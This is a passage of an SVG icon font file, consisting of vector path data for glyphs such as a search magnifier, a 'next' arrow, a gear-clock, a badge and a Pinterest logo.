l-8.44727 -15.1426l-51.54 -92.415l22.4629 -13.708l58.6406 76.6318c2.51855 3.28906 7.22656 3.91406 10.5146 1.39844c3.28906 -2.51758 3.91504 -7.22461 1.39746 -10.5146l-62.7412 -81.9922c-1.4668 -1.91699 -3.69531 -2.94336 -5.96191 -2.94336
c-1.33691 0 -2.68652 0.357422 -3.90137 1.09961l-34.3818 20.9795c-3.43848 2.09766 -4.60547 6.53711 -2.64355 10.0547l77.7734 139.446c0.0214844 0.0390625 0.0410156 0.078125 0.0615234 0.117188l2.3252 4.16895
c0.0117188 0.0214844 0.0283203 0.0400391 0.0390625 0.0625l0.00292969 0.00488281c0.160156 0.300781 0.339844 0.589844 0.538086 0.865234c0.0234375 0.0322266 0.0390625 0.0673828 0.0625 0.0996094l12.0439 16.2646
c0.00976562 0.0126953 0.0195312 0.0244141 0.0302734 0.0361328l24.3379 32.8701l-65.6748 7.33398c-0.730469 0.0732422 -1.44727 0.183594 -2.1543 0.321289c-0.0498047 0.00878906 -0.0986328 0.015625 -0.147461 0.0253906
c-0.652344 0.132812 -1.29004 0.296875 -1.91895 0.481445c-0.113281 0.0332031 -0.228516 0.0605469 -0.339844 0.0957031c-0.563477 0.175781 -1.11328 0.376953 -1.65527 0.592773c-0.210938 0.0830078 -0.421875 0.166992 -0.629883 0.256836
c-0.443359 0.19043 -0.876953 0.397461 -1.30469 0.616211c-0.294922 0.149414 -0.586914 0.305664 -0.875977 0.46875c-0.339844 0.192383 -0.674805 0.392578 -1.00391 0.601562c-0.325195 0.206055 -0.642578 0.419922 -0.958008 0.642578
c-0.293945 0.208008 -0.583008 0.421875 -0.866211 0.642578c-0.296875 0.232422 -0.587891 0.469727 -0.874023 0.71582c-0.297852 0.257812 -0.588867 0.521484 -0.874023 0.791992c-0.239258 0.230469 -0.476562 0.464844 -0.708984 0.705078
c-0.3125 0.325195 -0.615234 0.65918 -0.908203 1.00195c-0.101562 0.118164 -0.212891 0.223633 -0.311523 0.34375c-3.39746 4.12891 -5.21973 9.19043 -5.25586 14.4629c0 0.03125 -0.00195312 0.0615234 -0.00195312 0.0917969
c-0.000976562 0.290039 0.0078125 0.582031 0.0175781 0.874023c0.00292969 0.102539 0.00195312 0.204102 0.00683594 0.307617c0.0117188 0.241211 0.0332031 0.481445 0.0527344 0.723633c0.0107422 0.146484 0.0166016 0.291992 0.0302734 0.439453
c1.23242 12.6689 12.5361 21.9785 25.2109 20.7412c0.0351562 -0.00292969 0.0703125 -0.00683594 0.106445 -0.0107422l78.3809 -8.75391c17.2354 25.335 30.6201 48.0186 38.7979 65.7812c5.91797 12.8516 8.45898 26.5498 8.74609 40.2412l-131.796 60.6963
c-10.2305 -9.11719 -18.9961 -19.9463 -24.9111 -32.7891l-1.19434 -2.63379c-1.70215 -3.77637 -6.14062 -5.45703 -9.91895 -3.75586c-3.77637 1.70117 -5.45801 6.14258 -3.75586 9.91895l1.22949 2.71094c6.88574 14.9482 17.6152 28.5537 31.79 40.4893
c0.219727 0.237305 0.456055 0.461914 0.708984 0.671875c43.1562 35.792 104.111 44.9512 109.015 45.6387c0.110352 0.0146484 0.196289 0.0283203 0.237305 0.0332031c0.115234 0.015625 0.230469 0.0117188 0.34668 0.0214844
c2.75879 0.244141 5.44238 -1.04199 6.95605 -3.38477c1.44629 -2.23926 35.4414 -55.5059 36.3135 -112.71c0.00390625 -0.326172 -0.0126953 -0.651367 -0.0498047 -0.972656c0.03125 -4.08496 -0.114258 -8.0918 -0.423828 -12.0225l3.14062 9.60352
c6.54395 20.0371 28.1787 31.0166 48.2295 24.4697l28.4141 -9.29102c0.359375 -0.118164 0.749023 -0.141602 1.11914 -0.0664062l29.0801 5.85059c2.61328 0.525391 5.3125 -0.375977 7.08496 -2.36914zM209.548 398.064l117.803 -54.249
c-0.188477 1.83398 -0.408203 3.66211 -0.65918 5.48145c-0.0390625 0.287109 -0.078125 0.574219 -0.119141 0.860352c-0.103516 0.720703 -0.210938 1.44043 -0.324219 2.15918c-0.046875 0.296875 -0.0957031 0.592773 -0.143555 0.889648
c-0.371094 2.28516 -0.788086 4.55176 -1.24414 6.7998c-0.0742188 0.365234 -0.148438 0.730469 -0.224609 1.09473c-0.133789 0.636719 -0.269531 1.27246 -0.408203 1.90527c-0.0917969 0.412109 -0.18457 0.824219 -0.27832 1.23535
c-0.212891 0.935547 -0.430664 1.86523 -0.65625 2.79102c-0.136719 0.563477 -0.271484 1.12598 -0.413086 1.68652c-0.128906 0.514648 -0.263672 1.02637 -0.396484 1.53906c-0.140625 0.539062 -0.282227 1.07715 -0.426758 1.61328
c-0.126953 0.470703 -0.253906 0.941406 -0.383789 1.40918c-0.19043 0.693359 -0.386719 1.38281 -0.583984 2.06934c-0.0859375 0.300781 -0.169922 0.605469 -0.257812 0.905273c-0.286133 0.977539 -0.578125 1.94824 -0.874023 2.91211
c-0.0917969 0.298828 -0.18457 0.595703 -0.27832 0.893555c-0.238281 0.765625 -0.479492 1.52637 -0.723633 2.28223c-0.0810547 0.248047 -0.160156 0.49707 -0.241211 0.744141c-0.672852 2.05957 -1.36523 4.08301 -2.07324 6.06543
c-0.0283203 0.0810547 -0.0576172 0.162109 -0.0869141 0.243164c-7.13965 19.9316 -15.709 35.7256 -19.8701 42.8838c-13.7324 -2.52246 -54.3086 -11.5088 -87.1357 -34.2148zM205.444 197.973l2.18164 16.0205l-4.46582 0.499023l-2.625 0.292969
c-0.260742 0.0234375 -0.519531 0.0322266 -0.777344 0.03125c-0.134766 -0.000976562 -0.266602 -0.0117188 -0.399414 -0.0185547c-0.125 -0.00683594 -0.250977 -0.00976562 -0.375 -0.0224609c-0.15332 -0.0146484 -0.301758 -0.0400391 -0.452148 -0.0634766
c-0.101562 -0.0166016 -0.204102 -0.0292969 -0.303711 -0.0488281c-0.15918 -0.03125 -0.31543 -0.0722656 -0.47168 -0.113281c-0.0878906 -0.0234375 -0.175781 -0.0429688 -0.261719 -0.0693359c-0.160156 -0.0478516 -0.317383 -0.102539 -0.472656 -0.161133
c-0.078125 -0.0283203 -0.157227 -0.0556641 -0.234375 -0.0869141c-0.158203 -0.0625 -0.311523 -0.133789 -0.464844 -0.207031c-0.0712891 -0.0341797 -0.142578 -0.0664062 -0.211914 -0.102539c-0.152344 -0.078125 -0.300781 -0.162109 -0.448242 -0.25
c-0.0664062 -0.0400391 -0.131836 -0.0800781 -0.197266 -0.121094c-0.143555 -0.0917969 -0.28418 -0.189453 -0.421875 -0.289062c-0.0625 -0.0458984 -0.125977 -0.0927734 -0.1875 -0.140625c-0.133789 -0.103516 -0.263672 -0.209961 -0.389648 -0.321289
c-0.0605469 -0.0527344 -0.120117 -0.109375 -0.179688 -0.164062c-0.121094 -0.113281 -0.239258 -0.228516 -0.353516 -0.347656c-0.0585938 -0.0625 -0.115234 -0.126953 -0.172852 -0.191406c-0.106445 -0.120117 -0.210938 -0.242188 -0.310547 -0.368164
c-0.0576172 -0.0732422 -0.112305 -0.148438 -0.166992 -0.224609c-0.0917969 -0.125 -0.183594 -0.25 -0.267578 -0.379883c-0.0546875 -0.0849609 -0.105469 -0.174805 -0.157227 -0.261719c-0.0761719 -0.126953 -0.152344 -0.253906 -0.22168 -0.385742
c-0.0517578 -0.0986328 -0.0966797 -0.201172 -0.144531 -0.302734c-0.0605469 -0.126953 -0.121094 -0.253906 -0.174805 -0.384766c-0.0478516 -0.115234 -0.0859375 -0.235352 -0.12793 -0.353516c-0.0449219 -0.124023 -0.0917969 -0.246094 -0.129883 -0.37207
c-0.0410156 -0.138672 -0.0722656 -0.282227 -0.106445 -0.423828c-0.0273438 -0.112305 -0.0605469 -0.22168 -0.0820312 -0.335938c-0.0410156 -0.207031 -0.0693359 -0.419922 -0.09375 -0.632812c-0.00683594 -0.0527344 -0.0175781 -0.102539 -0.0224609 -0.154297
c-0.00683594 -0.0791016 -0.00585938 -0.15625 -0.0107422 -0.235352c-0.0126953 -0.193359 -0.0283203 -0.387695 -0.0273438 -0.580078c0.000976562 -0.0712891 0.00878906 -0.142578 0.0107422 -0.214844c0.00683594 -0.201172 0.0126953 -0.400391 0.0332031 -0.598633
c0.00292969 -0.0302734 0.00976562 -0.0605469 0.0136719 -0.0898438c0.395508 -3.40137 2.93457 -6.24023 6.33887 -6.96582c0.0322266 -0.00683594 0.0615234 -0.0166016 0.0927734 -0.0224609c0.266602 -0.0546875 0.537109 -0.0947266 0.813477 -0.121094
c0.0341797 -0.00292969 0.0703125 -0.00683594 0.105469 -0.0117188zM348.308 67.7441l-75.917 45.8965l-25.5869 15.4658l-7.65137 -10.333l-2.27637 -4.0791c-5.52734 -9.98047 -2.26562 -22.4775 7.44727 -28.4766l73.9199 -45.6455
c2.84277 -1.75488 4.18066 -5.17969 3.2832 -8.39844l-20.166 -72.2373l24.2793 -7.1084l28.2422 100.473c1.63184 5.57227 -0.668945 11.4795 -5.57227 14.4424c-0.000976562 0.000976562 -0.000976562 0.000976562 -0.00195312 0.000976562zM339.399 213.183
c-6.51367 4.81934 -14.6631 5.89746 -21.8633 3.62988l4.78711 -0.535156c6.11426 -0.609375 11.6289 -3.55664 15.5342 -8.30371c3.91699 -4.76172 5.74609 -10.7637 5.14941 -16.9004s-3.54785 -11.6748 -8.31055 -15.5918
c-4.16992 -3.43066 -9.29297 -5.25977 -14.623 -5.25977c-0.754883 0 -1.51465 0.0371094 -2.27637 0.110352c-0.0361328 0.00292969 -0.0712891 0.00683594 -0.105469 0.0117188l-37.2695 4.16211l-24.6475 -33.2891l25.1328 -15.1953l16.8008 -10.1553l46.7783 63.1846
c3.13867 4.24512 4.79883 9.25977 4.79883 14.4971c0 7.82324 -3.60352 14.9805 -9.88574 19.6348zM320.707 201.364l-23.2861 2.60156c-0.0263672 0.00390625 -0.0527344 0.00488281 -0.0800781 0.00878906l-74.8008 8.35449l-2.18359 -16.0215l98.9365 -11.0498
c2.13281 -0.193359 4.21777 0.445312 5.87305 1.80762c1.66797 1.37109 2.70117 3.31055 2.91016 5.45996c0.430664 4.43555 -2.82715 8.39648 -7.2627 8.82812c-0.0361328 0.00292969 -0.0712891 0.00683594 -0.106445 0.0107422zM409.919 277.433
c0.582031 1.78418 0.999023 3.59082 1.24902 5.41211c-0.749023 -0.00585938 -1.49902 0.015625 -2.24902 0.0498047c-0.102539 0.00488281 -0.204102 0.0126953 -0.307617 0.0175781c-1.81055 0.0947266 -3.61719 0.305664 -5.41016 0.628906
c-0.105469 0.0185547 -0.210938 0.0361328 -0.316406 0.0556641c-0.856445 0.161133 -1.70703 0.348633 -2.55469 0.560547c-0.142578 0.0341797 -0.285156 0.0742188 -0.428711 0.111328c-0.857422 0.225586 -1.71191 0.467773 -2.55664 0.743164l-13.7529 4.5
c-0.296875 0.0986328 -0.595703 0.178711 -0.895508 0.244141c-0.0957031 0.0214844 -0.191406 0.03125 -0.286133 0.0488281c-0.208984 0.0390625 -0.417969 0.0800781 -0.625977 0.104492c-0.0673828 0.00683594 -0.133789 0.0078125 -0.201172 0.0136719
c-0.240234 0.0234375 -0.479492 0.0429688 -0.716797 0.0458984c-0.0253906 0 -0.0517578 -0.00195312 -0.0761719 -0.00195312c-3.28906 0.0205078 -6.39551 -1.73438 -8.05566 -4.625c-0.00488281 -0.00878906 -0.0117188 -0.0175781 -0.0166016 -0.0273438
c-0.128906 -0.225586 -0.245117 -0.461914 -0.355469 -0.701172c-0.0195312 -0.0439453 -0.0439453 -0.0849609 -0.0634766 -0.128906c-0.125 -0.282227 -0.237305 -0.573242 -0.334961 -0.873047l-0.40918 -1.23633
c-0.117188 -0.352539 -0.263672 -0.68457 -0.425781 -1.00684c-0.0341797 -0.0673828 -0.0673828 -0.135742 -0.103516 -0.202148c-0.165039 -0.307617 -0.347656 -0.601562 -0.550781 -0.876953c-0.0341797 -0.0458984 -0.0712891 -0.0888672 -0.106445 -0.134766
c-0.193359 -0.251953 -0.402344 -0.490234 -0.625977 -0.713867c-0.0332031 -0.0351562 -0.0664062 -0.0712891 -0.101562 -0.105469c-0.24707 -0.237305 -0.509766 -0.454102 -0.785156 -0.654297c-0.0537109 -0.0400391 -0.109375 -0.078125 -0.165039 -0.116211
c-0.287109 -0.198242 -0.582031 -0.380859 -0.892578 -0.537109c-0.000976562 -0.000976562 -0.000976562 -0.000976562 -0.00195312 -0.000976562c-0.311523 -0.155273 -0.636719 -0.282227 -0.966797 -0.394531
c-0.0576172 -0.0205078 -0.114258 -0.0410156 -0.173828 -0.0595703c-0.327148 -0.101562 -0.661133 -0.182617 -1.00098 -0.238281c-0.0498047 -0.00878906 -0.101562 -0.0136719 -0.15332 -0.0205078c-0.321289 -0.0458984 -0.648438 -0.0732422 -0.977539 -0.0771484
c-0.0292969 -0.000976562 -0.0576172 -0.00683594 -0.0869141 -0.00683594c-0.0117188 0 -0.0244141 0.00292969 -0.0351562 0.00292969c-0.34082 0.00195312 -0.683594 0.03125 -1.02832 0.0810547c-0.0732422 0.0107422 -0.148438 0.0244141 -0.222656 0.0371094
c-0.348633 0.0625 -0.699219 0.138672 -1.0459 0.25293l-15.5391 5.08105l-1.91211 -5.85156c-5.29395 -16.2061 3.58496 -33.6982 19.792 -38.9932c3.11426 -1.02246 6.34473 -1.53906 9.61035 -1.53906c13.4121 0 25.2197 8.56641 29.3818 21.3174zM438.197 317.63
l4.75977 14.5742l-16.4814 -3.31445c-2.90332 -0.583984 -5.92676 -0.40625 -8.74121 0.513672l-28.4102 9.29004c-12.1885 3.97754 -25.335 -2.69434 -29.3105 -14.8701l-8.79102 -26.8828l0.0292969 -0.00976562l9.14844 -2.99121
c0.356445 0.552734 0.745117 1.08398 1.14551 1.60449c0.0166016 0.0214844 0.0341797 0.0419922 0.0507812 0.0634766c0.382812 0.493164 0.786133 0.96875 1.20605 1.43066c0.0234375 0.0263672 0.046875 0.0517578 0.0703125 0.078125
c1.72461 1.87793 3.75 3.48438 6.03027 4.75684c0.0488281 0.0283203 0.0986328 0.0546875 0.147461 0.0810547c0.238281 0.130859 0.472656 0.270508 0.717773 0.394531c4.50586 2.28418 9.49316 3.08594 14.3916 2.375
c0.0498047 -0.00683594 0.0986328 -0.0136719 0.148438 -0.0224609c0.621094 -0.09375 1.24121 -0.210938 1.8584 -0.353516c0.0761719 -0.0175781 0.152344 -0.0380859 0.228516 -0.0556641c0.623047 -0.151367 1.24316 -0.320312 1.85938 -0.521484l13.7539 -4.50098
c4.88574 -1.59863 10.1035 -1.85645 15.0869 -0.74707c9.88672 2.19336 17.9697 9.51465 21.1016 19.1074zM132.452 -31.8789c4.14258 0 7.5 -3.3584 7.5 -7.5c0 -4.14258 -3.35742 -7.50098 -7.5 -7.50098h-74.5303c-4.14258 0 -7.5 3.3584 -7.5 7.50098
c0 4.1416 3.35742 7.5 7.5 7.5h74.5303zM132.452 11.1758c4.14258 0 7.5 -3.3584 7.5 -7.50098c0 -4.1416 -3.35742 -7.5 -7.5 -7.5h-52.374c-4.1416 0 -7.5 3.3584 -7.5 7.5c0 4.14258 3.3584 7.50098 7.5 7.50098h52.374zM132.452 54.2285c4.14258 0 7.5 -3.3584 7.5 -7.5
c0 -4.14258 -3.35742 -7.5 -7.5 -7.5h-22.1611c-4.1416 0 -7.5 3.35742 -7.5 7.5c0 4.1416 3.3584 7.5 7.5 7.5h22.1611z" />
    <glyph glyph-name="068-search-2" unicode="&#xf13e;" 
d="M454.305 390.353c74.084 -73.7734 77.2158 -192.711 7.11621 -270.28c-72.5732 -80.3047 -196.506 -86.5732 -276.812 -14l-14.9668 -14.9678l0.00390625 -0.00390625c12.0918 -12.0928 12.0889 -31.7002 -0.00390625 -43.792l-102.189 -102.189
c-12.0918 -12.0879 -31.6934 -12.0879 -43.7861 0l-14.5947 14.5957c-0.00195312 0.000976562 -0.00292969 0.00292969 -0.00390625 0.00390625c-12.0928 12.0938 -12.0898 31.7002 0.00390625 43.793l102.188 102.188
c0.000976562 0.000976562 0.00195312 0.00292969 0.00390625 0.00390625c12.0938 12.0928 31.7002 12.0898 43.792 -0.00390625l14.9678 14.9668c-69.9658 77.54 -66.8369 196.322 7.11523 270.07c76.6426 76.4307 200.733 76.2578 277.165 -0.384766zM155.057 61.9141
c4.02344 4.0293 4.02344 10.5557 0 14.585l-14.5947 14.6055c-4.08301 3.90332 -10.5137 3.90332 -14.5957 0l-102.188 -102.188c-4.02344 -4.0293 -4.02344 -10.5557 0 -14.585l14.5957 -14.6055c4.03027 -4.0293 10.5645 -4.0293 14.5947 0zM439.72 127.594
c68.416 68.5742 68.416 179.589 0 248.163c-68.5273 68.5244 -179.629 68.5244 -248.156 0c-68.5283 -68.5254 -68.5293 -179.631 -0.00390625 -248.159c68.5264 -68.5283 179.632 -68.5303 248.16 -0.00390625zM425.114 361.161c60.3789 -60.5 60.3789 -158.462 0 -218.962
l-14.5957 14.5957c52.3135 52.4414 52.3135 137.33 0 189.771l14.5957 14.5947v0z" />
    <glyph glyph-name="077-next" unicode="&#xf143;" 
d="M388.14 206.048c7.69141 -7.69336 7.69141 -20.1641 0 -27.8584l-236.421 -236.421c-7.69336 -7.69141 -20.1641 -7.69141 -27.8584 0c-7.69141 7.69336 -7.69141 20.165 0 27.8584l222.492 222.492l-222.492 222.492c-7.37402 7.63379 -7.37402 19.7383 0 27.373
c7.55859 7.82715 20.0312 8.04395 27.8584 0.485352z" />
    <glyph glyph-name="040-clock" unicode="&#xf124;" 
d="M473.492 258.264c21.9531 -2.59375 38.5078 -19.1982 38.5078 -38.623v-55.2705c0 -19.4229 -16.5547 -36.0283 -38.5068 -38.625l-22.416 -2.65234c-2.43848 -6.90137 -5.25293 -13.6914 -8.41113 -20.2939l13.9814 -17.7305
c13.6875 -17.3604 13.6504 -40.8086 -0.0830078 -54.542l-39.082 -39.082c-13.7344 -13.7354 -37.1826 -13.7695 -54.541 -0.0849609l-17.7305 13.9795c-6.60547 -3.16113 -13.3975 -5.97559 -20.3037 -8.41602l-2.65137 -22.416
c-2.59668 -21.9531 -19.2021 -38.5068 -38.626 -38.5068h-55.2705c-19.4258 0 -36.0303 16.5547 -38.626 38.5088l-2.65039 22.417c-6.90137 2.43945 -13.6914 5.25391 -20.2939 8.41309l-17.7305 -13.9785c-17.3584 -13.6875 -40.8076 -13.6494 -54.541 0.0839844
l-39.082 39.083c-13.7344 13.7344 -13.7705 37.1826 -0.0830078 54.542l13.9814 17.7305c-3.1582 6.60254 -5.97266 13.3926 -8.41113 20.2939l-22.417 2.65234c-21.9521 2.59473 -38.5059 19.2012 -38.5059 38.624v55.2705c0 19.4248 16.5547 36.0293 38.5078 38.625
l22.418 2.65137c2.43945 6.90137 5.25391 13.6914 8.41309 20.293l-13.9785 17.7305c-13.6875 17.3574 -13.6504 40.8057 0.0839844 54.541l39.082 39.082c13.7354 13.7354 37.1836 13.7695 54.543 0.0830078l17.7295 -13.9814
c6.60059 3.15723 13.3848 5.96875 20.2842 8.4082l2.65039 22.417c2.5957 21.9551 19.2012 38.5098 38.626 38.5098h55.2705c19.4238 0 36.0293 -16.5537 38.626 -38.5059l2.65137 -22.417c6.90039 -2.43848 13.6904 -5.25293 20.2939 -8.41211l17.7295 13.9814
c17.3613 13.6875 40.8096 13.6504 54.543 -0.0830078l39.083 -39.083c13.7334 -13.7354 13.7705 -37.1836 0.0839844 -54.541l-13.9785 -17.7314c3.15723 -6.59961 5.97168 -13.3896 8.41211 -20.293l22.417 -2.65137h0.000976562zM492 164.37v55.2705
c0 9.29102 -8.9668 17.3584 -20.8574 18.7646h0.000976562l-28.7051 3.39355c-3.89844 0.459961 -7.16602 3.15918 -8.35547 6.89941c-3.18555 10.0117 -7.24805 19.8115 -12.0752 29.127c-1.80664 3.48633 -1.40527 7.70801 1.02637 10.792l17.9023 22.707
c7.41211 9.40137 8.04883 21.4453 1.47949 28.0156l-39.083 39.082c-6.56934 6.57129 -18.6133 5.93164 -28.0166 -1.47949l-22.7061 -17.9043c-3.08398 -2.43164 -7.30859 -2.83301 -10.792 -1.02637c-9.32227 4.8291 -19.123 8.89258 -29.1279 12.0732
c-3.74023 1.18945 -6.43945 4.45703 -6.90039 8.35547l-3.39648 28.7041c-1.40527 11.8896 -9.47266 20.8555 -18.7637 20.8555h-55.2705c-9.29199 0 -17.3584 -8.9668 -18.7656 -20.8574l-3.39355 -28.7041c-0.460938 -3.89844 -3.15918 -7.16602 -6.89941 -8.35547
c-10.0049 -3.18262 -19.8018 -7.24414 -29.1201 -12.0713c-3.48633 -1.80664 -7.70801 -1.40332 -10.791 1.02734l-22.7061 17.9043c-9.40137 7.41504 -21.4473 8.0498 -28.0166 1.47949l-39.0811 -39.083c-6.57031 -6.57031 -5.93457 -18.6143 1.47949 -28.0156
l17.9014 -22.7061c2.43262 -3.08301 2.83301 -7.30469 1.02637 -10.791c-4.8291 -9.32227 -8.89258 -19.123 -12.0752 -29.1289c-1.18945 -3.74023 -4.45703 -6.43848 -8.35449 -6.89941l-28.7061 -3.39355c-11.8906 -1.40625 -20.8574 -9.47363 -20.8574 -18.7646v-55.2705
c0 -9.29102 8.96582 -17.3574 20.8555 -18.7637l28.7041 -3.39648c3.89746 -0.460938 7.16504 -3.16016 8.35449 -6.90039c3.18359 -10.0078 7.24609 -19.8086 12.0732 -29.1279c1.80664 -3.48535 1.4043 -7.70801 -1.02637 -10.792l-17.9043 -22.707
c-7.41406 -9.40137 -8.0498 -21.4453 -1.47852 -28.0156l39.082 -39.083c6.56738 -6.56836 18.6133 -5.93457 28.0156 1.47949l22.7061 17.9014c1.80078 1.42188 3.98926 2.14941 6.19336 2.14941c1.56836 0 3.14648 -0.369141 4.59766 -1.12109
c9.32324 -4.83008 19.123 -8.89355 29.1289 -12.0762c3.74023 -1.18945 6.43848 -4.45801 6.89941 -8.35547l3.39355 -28.7051c1.40625 -11.8906 9.47363 -20.8574 18.7656 -20.8574h55.2705c9.29102 0 17.3584 8.96582 18.7656 20.8564l3.39551 28.7041
c0.460938 3.89844 3.16016 7.16602 6.90039 8.35547c10.0078 3.18262 19.8105 7.24707 29.1357 12.0781c3.48926 1.80664 7.70898 1.40527 10.792 -1.02637l22.7061 -17.9023c9.40137 -7.41309 21.4463 -8.04883 28.0156 -1.47949l39.082 39.083
c6.57031 6.56934 5.93457 18.6143 -1.47852 28.0166l-17.9043 22.7061c-2.43164 3.08301 -2.83301 7.30566 -1.02637 10.792c4.82715 9.32031 8.89062 19.1201 12.0732 29.1279c1.18945 3.74023 4.45703 6.43945 8.35449 6.90039l28.7041 3.39648
c11.8877 1.40527 20.8535 9.47168 20.8535 18.7627zM255.999 353.72c89.1729 0 161.722 -72.5469 161.722 -161.72c0 -73.7197 -49.7803 -138.102 -121.06 -156.564c-0.84082 -0.217773 -1.68457 -0.321289 -2.51465 -0.321289c-4.44824 0 -8.50781 2.98828 -9.6748 7.49512
c-1.38477 5.3457 1.82715 10.8027 7.17285 12.1875c62.457 16.1768 106.076 72.5967 106.076 137.203c0 78.1445 -63.5742 141.721 -141.721 141.721s-141.721 -63.5762 -141.721 -141.721c0 -62.4541 41.7988 -118.37 101.646 -135.978
c5.29883 -1.55957 8.33008 -7.11816 6.77148 -12.416c-1.56055 -5.29883 -7.11523 -8.33105 -12.416 -6.77148c-32.8174 9.65527 -62.3457 30.0527 -83.1426 57.4346c-21.498 28.3037 -32.8594 62.0986 -32.8594 97.7295c0 89.1729 72.5479 161.721 161.721 161.721z
M334.324 145.06c4.39746 -3.34082 5.25488 -9.61328 1.91406 -14.0117c-1.9668 -2.58984 -4.95117 -3.95117 -7.9707 -3.95117c-2.10742 0 -4.23145 0.664062 -6.04102 2.03809l-72.2744 54.9033c-2.49023 1.88965 -3.95215 4.83594 -3.95215 7.96191v49.625
c0 5.52344 4.47754 10 10 10s10 -4.47656 10 -10v-44.6631zM246 283.98c0 5.52246 4.47754 10 10 10s10 -4.47754 10 -10c0 -5.52344 -4.47754 -10 -10 -10s-10 4.47656 -10 10zM242.36 40.2803c0 5.52246 4.47656 10 10 10c5.52246 0 10 -4.47754 10 -10
c0 -5.52344 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47656 -10 10z" />
    <glyph glyph-name="033-badge" unicode="&#xf11d;" 
d="M460.459 6.67969c2.02441 -3.50488 1.73633 -7.88379 -0.730469 -11.0918c-2.46582 -3.20898 -6.62012 -4.61719 -10.5303 -3.5625l-66.4551 17.9033l-17.7217 -66.5029c-1.04297 -3.91113 -4.33984 -6.80762 -8.35156 -7.33887
c-0.439453 -0.0576172 -0.878906 -0.0869141 -1.31445 -0.0869141c-3.53711 0 -6.85547 1.87891 -8.65723 5l-90.6982 157.094l-90.6982 -157.095c-1.80176 -3.12012 -5.11914 -5 -8.65723 -5c-0.435547 0 -0.875 0.0292969 -1.31445 0.0869141
c-4.0127 0.53125 -7.30859 3.42773 -8.35156 7.33887l-17.7217 66.5029l-66.4541 -17.9033c-3.90918 -1.05176 -8.06543 0.354492 -10.5303 3.5625c-2.4668 3.20898 -2.75488 7.58789 -0.731445 11.0928l86.207 149.313c-31.8916 30.9199 -51.748 74.1846 -51.748 122.007
c0 93.7383 76.2607 170 170 170s170 -76.2617 170 -170c0 -47.8223 -19.8564 -91.0869 -51.7471 -122.006zM106 278c0 -82.71 67.29 -150 150 -150s150 67.29 150 150s-67.29 150 -150 150s-150 -67.29 -150 -150zM160.076 -28.0518l79.0342 136.889
c-32.0889 3.17969 -61.5781 15.3242 -85.9336 33.8799l-72.2207 -125.089l52.7803 14.2197c2.56641 0.691406 5.30078 0.333008 7.60156 -0.996094c2.30078 -1.32715 3.97949 -3.51758 4.66309 -6.08496zM378.264 31.8486l52.7793 -14.2197l-72.2197 125.09
c-24.3555 -18.5557 -53.8447 -30.7002 -85.9336 -33.8799l79.0342 -136.89l14.0752 52.8184c0.683594 2.56738 2.3623 4.75684 4.66309 6.08496c2.30078 1.3291 5.03516 1.6875 7.60156 0.996094zM193.352 298.391c2.13184 6.56445 7.69824 11.2598 14.5273 12.2559
l22.0938 3.2168l9.875 20.0234c3.05469 6.19043 9.23828 10.0361 16.1396 10.0381h0.00488281c6.89941 0 13.083 -3.8418 16.1387 -10.0303l9.88574 -20.0186l22.0967 -3.20508c6.83008 -0.991211 12.3984 -5.68359 14.5342 -12.2471
c2.13379 -6.5625 0.390625 -13.6338 -4.55078 -18.4531l-15.9834 -15.5889l3.7793 -22.0049c1.16895 -6.80176 -1.57227 -13.5488 -7.15527 -17.6074c-5.58203 -4.05859 -12.8467 -4.58496 -18.9561 -1.375l-19.7656 10.3848l-19.7588 -10.3955
c-2.6582 -1.39746 -5.53516 -2.08887 -8.39648 -2.08887c-3.71582 0 -7.4043 1.16309 -10.5596 3.4541c-5.58496 4.05566 -8.33105 10.8008 -7.16602 17.6035l3.76953 22.0068l-15.9922 15.5811c-4.94434 4.81543 -6.69141 11.8857 -4.56055 18.4502zM238.058 294.828
l-23.2852 -3.38965l16.8545 -16.4219c2.35742 -2.29688 3.43359 -5.60645 2.87793 -8.85059l-3.97168 -23.1943l20.8262 10.9561c2.91309 1.53223 6.39355 1.5332 9.30664 0.00195312l20.832 -10.9443l-3.98438 23.1914c-0.556641 3.24414 0.518555 6.55469 2.87402 8.85254
l16.8467 16.4297l-23.2891 3.37793c-3.25684 0.47168 -6.07324 2.5166 -7.53125 5.46777l-10.4199 21.0996l-10.4082 -21.1045c-1.45605 -2.95117 -4.27051 -4.99805 -7.52832 -5.47168zM256 152c-69.4756 0 -126 56.5234 -126 126
c0 51.3311 30.6797 97.0977 78.1621 116.599c5.10938 2.09766 10.9502 -0.342773 13.0488 -5.45117c2.09766 -5.1084 -0.342773 -10.9512 -5.45215 -13.0498c-39.9473 -16.4053 -65.7588 -54.9121 -65.7588 -98.0977c0 -58.4492 47.5508 -106 106 -106s106 47.5508 106 106
c0 43.083 -25.7275 81.5547 -65.5449 98.0098c-5.10449 2.10938 -7.53125 7.95703 -5.42188 13.0615c2.10742 5.10352 7.95312 7.53418 13.0605 5.42188c47.3262 -19.5586 77.9062 -65.2842 77.9062 -116.493c0 -69.4766 -56.5234 -126 -126 -126zM256.13 384
c-2.62988 0 -5.20996 1.07031 -7.07031 2.92969c-1.86914 1.86035 -2.92969 4.44043 -2.92969 7.07031s1.06055 5.20996 2.92969 7.07031c1.86035 1.85938 4.44043 2.92969 7.07031 2.92969s5.20996 -1.07031 7.07031 -2.92969
c1.85938 -1.86035 2.92969 -4.44043 2.92969 -7.07031s-1.07031 -5.20996 -2.92969 -7.07031c-1.86035 -1.85938 -4.44043 -2.92969 -7.07031 -2.92969z" />
    <glyph glyph-name="085-pinterest" unicode="&#xf14a;" 
d="M262.955 448c112.938 0 200.683 -76.7148 201.023 -179.242c0 -106.944 -70.8691 -193.131 -168.917 -193.131c-32.96 0 -63.8936 16.2129 -74.624 35.584c0 0 -16.2773 -59.3066 -20.2451 -73.9199c-10.9014 -40.1279 -49.8135 -95.6377 -52.9922 -99.7979
c-1.98438 -2.60254 -5.52539 -1.59961 -6.14453 1.55762c-1.00195 5.73828 -12.4795 72.3203 -2.36719 113.45c5.97266 24.2988 38.165 154.347 38.165 154.347s-9.72852 18.5605 -9.72852 46.0586c0 88.9814 100.054 98.9443 100.054 31.7871
c0 -26.6455 -17.877 -66.3896 -27.0078 -103.36c-7.53125 -31.04 16.2773 -56.1279 48.2344 -56.1279c123.989 0 160.234 268.416 -33.749 268.416c-134.037 0 -180.843 -138.282 -122.688 -205.547c2.56055 -2.96484 2.96582 -5.7168 2.17578 -8.89551
c-9.9834 -38.1865 -8.44727 -44.5654 -20.0527 -39.3389c-40.6826 17.9844 -66.0908 74.71 -66.0908 120.171c0 98.0479 74.6025 187.968 214.955 187.989z" />
    <glyph glyph-name="034-bars-chart" unicode="&#xf11e;" 
